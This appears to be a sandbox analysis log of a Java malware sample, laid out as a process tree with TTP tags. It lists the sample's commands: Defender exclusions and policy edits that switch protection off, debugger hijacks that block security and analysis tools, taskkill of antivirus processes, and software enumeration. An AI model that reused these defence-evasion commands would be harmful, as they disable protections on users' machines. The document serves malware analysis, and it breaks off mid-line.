PID 508 wrote to memory of 4492	508	java.exe	348
PID 508 wrote to memory of 4492	508	java.exe	348
PID 508 wrote to memory of 2692	508	java.exe	351
PID 508 wrote to memory of 2692	508	java.exe	351
PID 508 wrote to memory of 4108	508	java.exe	353
PID 508 wrote to memory of 4108	508	java.exe	353
PID 508 wrote to memory of 4840	508	java.exe	355
PID 508 wrote to memory of 4840	508	java.exe	355

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
3648	attrib.exe
4068	attrib.exe
1828	attrib.exe
3140	attrib.exe
3104	attrib.exe
3892	attrib.exe
2812	attrib.exe
3640	attrib.exe

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\Inquiry.jar
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:508
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2356
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2688
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3088
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3828
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4044
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:3640
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:3648
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\DNVJe\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:4068
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\DNVJe\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:1828
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\DNVJe
  2⤵
  - Views/modifies file attributes
  PID:3140
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\DNVJe
  2⤵
  - Views/modifies file attributes
  PID:3104
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\DNVJe
  2⤵
  - Views/modifies file attributes
  PID:3892
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +s +r C:\Users\Admin\DNVJe\AWHZt.class
  2⤵
  - Views/modifies file attributes
  PID:2812
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1040
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:2384
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:2936
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\DNVJe','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\DNVJe\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1528
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1588
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:1844
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1892
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:2352
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2348
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4052
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:1724
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4036
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:4060
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3844
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3740
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2104
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3080
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2076
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2348
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:992
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3036
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3992
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3732
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4056
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2104
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2320
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4052
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:64
    3⤵
    PID:1124
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:32
    3⤵
    PID:1416
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3820
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1688
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:1372
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:1476
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:988
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    PID:3964
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:3932
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2100
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:2960
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:3912
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3948
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:3996
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:964
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3732
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:1844
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:1948
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1476
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:3964
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:3564
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1568
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:348
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:3840
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2520
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3952
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:1540
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:1844
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1528
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:2348
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:3980
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3036
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:3836
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:2808
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3736
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:2692
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:1848
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3552
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:3980
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:580
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2808
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    3⤵
    PID:1844
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    3⤵
    PID:1848
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2668
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    3⤵
    PID:3924
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    3⤵
    PID:1848
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3768
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4112
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:4156
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:4176
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4196
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:64
    3⤵
    PID:4232
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:32
    3⤵
    PID:4252
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4272
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:4308
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:4328
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4348
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    PID:4384
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:4404
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4424
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:4460
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:4480
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4500
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    PID:4536
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:4556
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4576
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    PID:4612
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:4632
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4652
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:64
    3⤵
    PID:4688
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:32
    3⤵
    PID:4708
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4728
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    PID:4764
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:4784
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4804
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    PID:4840
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:4860
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4880
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    PID:4976
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:5008
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4892
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5024
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:64
    3⤵
    PID:5060
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:32
    3⤵
    PID:5080
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5100
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1848
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4160
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1240
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4156
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4188
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4236
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4280
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4320
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4344
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    PID:4412
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:4416
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4464
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4516
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    PID:3896
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:4648
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4668
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    PID:4720
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:4768
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4800
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
    3⤵
    PID:4852
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
    3⤵
    PID:4872
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4924
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:4936
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:4892
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4920
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:5068
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:5060
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5108
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:4128
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:4192
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4156
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:4324
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:4332
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4384
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:4488
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:4624
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3896
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:4476
- - C:\Windows\system32\reg.exe
